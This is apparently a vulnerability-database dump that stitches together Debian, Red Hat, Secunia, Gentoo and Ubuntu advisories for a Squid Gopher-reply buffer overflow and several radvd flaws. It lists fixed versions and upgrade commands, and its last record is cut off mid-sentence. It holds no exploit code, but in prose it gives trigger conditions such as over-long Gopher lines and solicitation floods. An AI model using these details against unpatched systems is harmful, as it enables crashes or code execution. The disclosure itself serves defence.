var-201109-0081
|
Buffer overflow in the gopherToHTML function in gopher.cc in the Gopher reply parser in Squid 3.0 before 3.0.STABLE26, 3.1 before 3.1.15, and 3.2 before 3.2.0.11 allows remote Gopher servers to cause a denial of service (memory corruption and daemon restart) or possibly have unspecified other impact via a long line in a response. NOTE: This issue exists because of a CVE-2005-0094 regression. Squid is a proxy server and web cache server. Squid is flawed in parsing responses from the Gopher server. If the Gopher server returns more than 4096 bytes, it can trigger a buffer overflow. This overflow can cause memory corruption to generally cause Squid to crash. A malicious user must set up a fake Gopher server and forward the request through Squid. Successful exploitation of vulnerabilities allows arbitrary code to be executed in a server context. Squid Proxy is prone remote buffer-overflow vulnerability affects the Gopher-to-HTML functionality. Failed exploit attempts will result in a denial-of-service condition. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- --------------------------------------------------------------------------
Debian Security Advisory DSA-2304-1 security@debian.org
http://www.debian.org/security/ Nico Golde
Sep 11, 2011 http://www.debian.org/security/faq
- --------------------------------------------------------------------------
Package : squid3
Vulnerability : buffer overflow
Problem type : remote
Debian-specific: no
Debian bug : 639755
CVE IDs : CVE-2011-3205
Ben Hawkes discovered that squid3, a full featured Web Proxy cache
(HTTP proxy), is vulnerable to a buffer overflow when processing gopher
server replies.
For the oldstable distribution (lenny), this problem has been fixed in
version 3.0.STABLE8-3+lenny5.
For the stable distribution (squeeze), this problem has been fixed in
version 3.1.6-1.2+squeeze1.
For the testing distribution (wheezy), this problem has been fixed in
version 3.1.15-1.
For the unstable distribution (sid), this problem has been fixed in
version 3.1.15-1.
We recommend that you upgrade your squid3 packages.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: squid security update
Advisory ID: RHSA-2011:1293-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1293.html
Issue date: 2011-09-14
CVE Names: CVE-2011-3205
=====================================================================
1. Summary:
An updated squid package that fixes one security issue is now available for
Red Hat Enterprise Linux 6.
The Red Hat Security Response Team has rated this update as having moderate
security impact. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available from the CVE link in
the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
3. Description:
Squid is a high-performance proxy caching server for web clients,
supporting FTP, Gopher, and HTTP data objects.
(CVE-2011-3205)
Users of squid should upgrade to this updated package, which contains a
backported patch to correct this issue. After installing this update, the
squid service will be restarted automatically.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Package List:
Red Hat Enterprise Linux Server (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/squid-3.1.10-1.el6_1.1.src.rpm
i386:
squid-3.1.10-1.el6_1.1.i686.rpm
squid-debuginfo-3.1.10-1.el6_1.1.i686.rpm
ppc64:
squid-3.1.10-1.el6_1.1.ppc64.rpm
squid-debuginfo-3.1.10-1.el6_1.1.ppc64.rpm
s390x:
squid-3.1.10-1.el6_1.1.s390x.rpm
squid-debuginfo-3.1.10-1.el6_1.1.s390x.rpm
x86_64:
squid-3.1.10-1.el6_1.1.x86_64.rpm
squid-debuginfo-3.1.10-1.el6_1.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/squid-3.1.10-1.el6_1.1.src.rpm
i386:
squid-3.1.10-1.el6_1.1.i686.rpm
squid-debuginfo-3.1.10-1.el6_1.1.i686.rpm
x86_64:
squid-3.1.10-1.el6_1.1.x86_64.rpm
squid-debuginfo-3.1.10-1.el6_1.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-3205.html
https://access.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFOcPqzXlSAg2UNWIIRAutlAJ9nlG0w3FNBVqFtxSNe10FKir/WkACeNQAA
rDOr/svPTfi23jLvkODeYbk=
=0hIH
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. ----------------------------------------------------------------------
The Secunia CSI 5.0 Beta - now available for testing
Find out more, take a free test drive, and share your opinion with us:
http://secunia.com/blog/242
----------------------------------------------------------------------
TITLE:
Squid Gopher Response Processing Buffer Overflow Vulnerability
SECUNIA ADVISORY ID:
SA45805
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/45805/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=45805
RELEASE DATE:
2011-08-30
DISCUSS ADVISORY:
http://secunia.com/advisories/45805/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/45805/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45805
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Squid, which can be exploited by
malicious people to cause a DoS (Denial of Service) or potentially
compromise a vulnerable system.
The vulnerability is caused due to a boundary error when processing
Gopher responses and can be exploited to cause a buffer overflow via
an overly long string.
This is related to vulnerability #2 in:
SA13825
The vulnerability is reported in versions 3.0.x prior to 3.0.STABLE25
and 3.1.x prior to 3.1.14
SOLUTION:
Update to version 3.0.STABLE26 or 3.1.15.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits Ben Hawkes, Google Security Team.
ORIGINAL ADVISORY:
http://www.squid-cache.org/Advisories/SQUID-2011_3.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. ----------------------------------------------------------------------
The new Secunia Corporate Software Inspector (CSI) 5.0
Integrates with Microsoft WSUS & SCCM and supports Apple Mac OS X. This fixes a vulnerability,
which can be exploited by malicious people to cause a DoS (Denial of
Service) or potentially compromise a vulnerable system.
For more information:
SA45805
SOLUTION:
Apply updated packages via the apt-get package manager. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201110-24
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Squid: Multiple vulnerabilities
Date: October 26, 2011
Bugs: #279379, #279380, #301828, #334263, #381065, #386215
ID: 201110-24
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities were found in Squid allowing attackers to
execute arbitrary code or cause a Denial of Service.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-proxy/squid < 3.1.15 >= 3.1.15
Description
===========
Multiple vulnerabilities have been discovered in Squid. Please review
the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All squid users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-proxy/squid-3.1.15"
NOTE: This is a legacy GLSA. Updates for all affected architectures are
available since September 4, 2011. It is likely that your system is
already no longer affected by this issue.
References
==========
[ 1 ] CVE-2009-2621
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2621
[ 2 ] CVE-2009-2622
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2622
[ 3 ] CVE-2009-2855
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2855
[ 4 ] CVE-2010-0308
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0308
[ 5 ] CVE-2010-0639
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0639
[ 6 ] CVE-2010-2951
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2951
[ 7 ] CVE-2010-3072
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3072
[ 8 ] CVE-2011-3205
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3205
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201110-24.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
|
|
var-201402-0028
|
The process_rs function in the router advertisement daemon (radvd) before 1.8.2, when UnicastOnly is enabled, allows remote attackers to cause a denial of service (temporary service hang) via a large number of ND_ROUTER_SOLICIT requests. radvd is prone to the follow security vulnerabilities:
1. Multiple local privilege-escalation vulnerability.
2. A local arbitrary file-overwrite vulnerability.
3. Multiple remote denial-of-service vulnerabilities.
An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. An input validation vulnerability exists in the 'process_rs' function in radvd 1.8.1 and earlier. ==========================================================================
Ubuntu Security Notice USN-1257-1
November 10, 2011
radvd vulnerabilities
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 11.10
- Ubuntu 11.04
- Ubuntu 10.10
- Ubuntu 10.04 LTS
Summary:
radvd could be made to crash or overwrite certain files if it received
specially crafted network traffic.
Software Description:
- radvd: Router Advertisement Daemon
Details:
Vasiliy Kulikov discovered that radvd incorrectly parsed the
ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected
releases should reduce the vulnerability to a denial of service. This issue
only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601)
Vasiliy Kulikov discovered that radvd incorrectly filtered interface names
when creating certain files.
(CVE-2011-3602)
Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604)
Vasiliy Kulikov discovered that radvd incorrectly handled delays when used
in unicast mode, which is not the default in Ubuntu. (CVE-2011-3605)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 11.10:
radvd 1:1.8-1ubuntu0.1
Ubuntu 11.04:
radvd 1:1.7-1ubuntu0.1
Ubuntu 10.10:
radvd 1:1.6-1ubuntu0.1
Ubuntu 10.04 LTS:
radvd 1:1.3-1.1ubuntu0.1
In general, a standard system update will make all the necessary changes.
References:
http://www.ubuntu.com/usn/usn-1257-1
CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605
Package Information:
https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1
https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1
https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1
https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201111-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: radvd: Multiple vulnerabilities
Date: November 20, 2011
Bugs: #385967
ID: 201111-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in radvd which could
potentially lead to privilege escalation, data loss, or a Denial of
Service.
Background
==========
radvd is an IPv6 router advertisement daemon for Linux and BSD.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/radvd < 1.8.2 >= 1.8.2
Description
===========
Multiple vulnerabilities have been discovered in radvd. Please review
the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All radvd users should upgrade to the latest stable version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2"
References
==========
[ 1 ] CVE-2011-3601
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601
[ 2 ] CVE-2011-3602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602
[ 3 ] CVE-2011-3603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603
[ 4 ] CVE-2011-3604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604
[ 5 ] CVE-2011-3605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201111-08.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach?
Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM:
http://secunia.com/products/corporate/vim/ovum_2011_request/
----------------------------------------------------------------------
TITLE:
Debian update for radvd
SECUNIA ADVISORY ID:
SA46639
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/46639/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=46639
RELEASE DATE:
2011-10-31
DISCUSS ADVISORY:
http://secunia.com/advisories/46639/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/46639/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46639
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Debian has issued an update for radvd. This fixes a security issue
and multiple vulnerabilities, which can be exploited by malicious
people to cause a DoS (Denial of Service).
For more information:
SA46200
SOLUTION:
Apply updated packages via the apt-get package manager.
ORIGINAL ADVISORY:
DSA-2323-1:
http://www.debian.org/security/2011/dsa-2323
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -------------------------------------------------------------------------
Debian Security Advisory DSA-2323-1 security@debian.org
http://www.debian.org/security/ Yves-Alexis Perez
October 26, 2011 http://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : radvd
Vulnerability : several
Problem type : remote
Debian-specific: no
CVE ID : CVE-2011-3602 CVE-2011-3604 CVE-2011-3605
Debian Bug : 644614
Multiple security issues were discovered by Vasiliy Kulikov in radvd, an
IPv6 Router Advertisement daemon:
CVE-2011-3602
set_interface_var() function doesn't check the interface name, which is
chosen by an unprivileged user.
CVE-2011-3604
process_ra() function lacks multiple buffer length checks which could
lead to memory reads outside the stack, causing a crash of the daemon.
CVE-2011-3605
process_rs() function calls mdelay() (a function to wait for a defined
time) unconditionnally when running in unicast-only mode. As this call
is in the main thread, that means all request processing is delayed (for
a time up to MAX_RA_DELAY_TIME, 500 ms by default).
Note: upstream and Debian default is to use anycast mode.
For the oldstable distribution (lenny), this problem has been fixed in
version 1:1.1-3.1.
For the stable distribution (squeeze), this problem has been fixed in
version 1:1.6-1.1.
For the testing distribution (wheezy), this problem has been fixed in
version 1:1.8-1.2.
For the unstable distribution (sid), this problem has been fixed in
version 1:1.8-1.2.
We recommend that you upgrade your radvd packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
iEYEARECAAYFAk6q2QcACgkQXm3vHE4uylqlEQCgpdFwHzpKLF6KHlJs4y/ykeo/
oEYAniJXFaff25pMtXzM6Ovu8zslZm7H
=VfHu
-----END PGP SIGNATURE-----
|
|
var-201402-0027
|
The process_ra function in the router advertisement daemon (radvd) before 1.8.2 allows remote attackers to cause a denial of service (stack-based buffer over-read and crash) via unspecified vectors. radvd is prone to the follow security vulnerabilities:
1. Multiple local privilege-escalation vulnerability.
2. A local arbitrary file-overwrite vulnerability.
3. Multiple remote denial-of-service vulnerabilities.
An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. A security vulnerability exists in the 'process_ra' function in radvd 1.8.1 and earlier. ==========================================================================
Ubuntu Security Notice USN-1257-1
November 10, 2011
radvd vulnerabilities
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 11.10
- Ubuntu 11.04
- Ubuntu 10.10
- Ubuntu 10.04 LTS
Summary:
radvd could be made to crash or overwrite certain files if it received
specially crafted network traffic.
Software Description:
- radvd: Router Advertisement Daemon
Details:
Vasiliy Kulikov discovered that radvd incorrectly parsed the
ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected
releases should reduce the vulnerability to a denial of service. This issue
only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601)
Vasiliy Kulikov discovered that radvd incorrectly filtered interface names
when creating certain files.
(CVE-2011-3602)
Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604)
Vasiliy Kulikov discovered that radvd incorrectly handled delays when used
in unicast mode, which is not the default in Ubuntu. If used in unicast
mode, a remote attacker could cause radvd outages, resulting in a denial of
service. (CVE-2011-3605)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 11.10:
radvd 1:1.8-1ubuntu0.1
Ubuntu 11.04:
radvd 1:1.7-1ubuntu0.1
Ubuntu 10.10:
radvd 1:1.6-1ubuntu0.1
Ubuntu 10.04 LTS:
radvd 1:1.3-1.1ubuntu0.1
In general, a standard system update will make all the necessary changes.
References:
http://www.ubuntu.com/usn/usn-1257-1
CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605
Package Information:
https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1
https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1
https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1
https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201111-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: radvd: Multiple vulnerabilities
Date: November 20, 2011
Bugs: #385967
ID: 201111-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in radvd which could
potentially lead to privilege escalation, data loss, or a Denial of
Service.
Background
==========
radvd is an IPv6 router advertisement daemon for Linux and BSD.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/radvd < 1.8.2 >= 1.8.2
Description
===========
Multiple vulnerabilities have been discovered in radvd. Please review
the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All radvd users should upgrade to the latest stable version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2"
References
==========
[ 1 ] CVE-2011-3601
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601
[ 2 ] CVE-2011-3602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602
[ 3 ] CVE-2011-3603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603
[ 4 ] CVE-2011-3604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604
[ 5 ] CVE-2011-3605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201111-08.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach?
Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM:
http://secunia.com/products/corporate/vim/ovum_2011_request/
----------------------------------------------------------------------
TITLE:
Debian update for radvd
SECUNIA ADVISORY ID:
SA46639
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/46639/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=46639
RELEASE DATE:
2011-10-31
DISCUSS ADVISORY:
http://secunia.com/advisories/46639/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/46639/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46639
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Debian has issued an update for radvd. This fixes a security issue
and multiple vulnerabilities, which can be exploited by malicious
people to cause a DoS (Denial of Service).
For more information:
SA46200
SOLUTION:
Apply updated packages via the apt-get package manager.
ORIGINAL ADVISORY:
DSA-2323-1:
http://www.debian.org/security/2011/dsa-2323
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -------------------------------------------------------------------------
Debian Security Advisory DSA-2323-1 security@debian.org
http://www.debian.org/security/ Yves-Alexis Perez
October 26, 2011 http://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : radvd
Vulnerability : several
Problem type : remote
Debian-specific: no
CVE ID : CVE-2011-3602 CVE-2011-3604 CVE-2011-3605
Debian Bug : 644614
Multiple security issues were discovered by Vasiliy Kulikov in radvd, an
IPv6 Router Advertisement daemon:
CVE-2011-3602
set_interface_var() function doesn't check the interface name, which is
chosen by an unprivileged user.
CVE-2011-3604
process_ra() function lacks multiple buffer length checks which could
lead to memory reads outside the stack, causing a crash of the daemon.
CVE-2011-3605
process_rs() function calls mdelay() (a function to wait for a defined
time) unconditionnally when running in unicast-only mode. As this call
is in the main thread, that means all request processing is delayed (for
a time up to MAX_RA_DELAY_TIME, 500 ms by default).
Note: upstream and Debian default is to use anycast mode.
For the oldstable distribution (lenny), this problem has been fixed in
version 1:1.1-3.1.
For the stable distribution (squeeze), this problem has been fixed in
version 1:1.6-1.1.
For the testing distribution (wheezy), this problem has been fixed in
version 1:1.8-1.2.
For the unstable distribution (sid), this problem has been fixed in
version 1:1.8-1.2.
We recommend that you upgrade your radvd packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
iEYEARECAAYFAk6q2QcACgkQXm3vHE4uylqlEQCgpdFwHzpKLF6KHlJs4y/ykeo/
oEYAniJXFaff25pMtXzM6Ovu8zslZm7H
=VfHu
-----END PGP SIGNATURE-----
|
|
var-201402-0026
|
Buffer overflow in the process_ra function in the router advertisement daemon (radvd) before 1.8.2 allows remote attackers to execute arbitrary code or cause a denial of service (crash) via a negative value in a label_len value. radvd is prone to the follow security vulnerabilities:
1. Multiple local privilege-escalation vulnerability.
2. A local arbitrary file-overwrite vulnerability.
3. Multiple remote denial-of-service vulnerabilities.
An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. A buffer overflow vulnerability exists in the 'process_ra' function in radvd 1.8.1 and earlier. ==========================================================================
Ubuntu Security Notice USN-1257-1
November 10, 2011
radvd vulnerabilities
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 11.10
- Ubuntu 11.04
- Ubuntu 10.10
- Ubuntu 10.04 LTS
Summary:
radvd could be made to crash or overwrite certain files if it received
specially crafted network traffic.
Software Description:
- radvd: Router Advertisement Daemon
Details:
Vasiliy Kulikov discovered that radvd incorrectly parsed the
ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected
releases should reduce the vulnerability to a denial of service. This issue
only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601)
Vasiliy Kulikov discovered that radvd incorrectly filtered interface names
when creating certain files.
(CVE-2011-3602)
Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604)
Vasiliy Kulikov discovered that radvd incorrectly handled delays when used
in unicast mode, which is not the default in Ubuntu. If used in unicast
mode, a remote attacker could cause radvd outages, resulting in a denial of
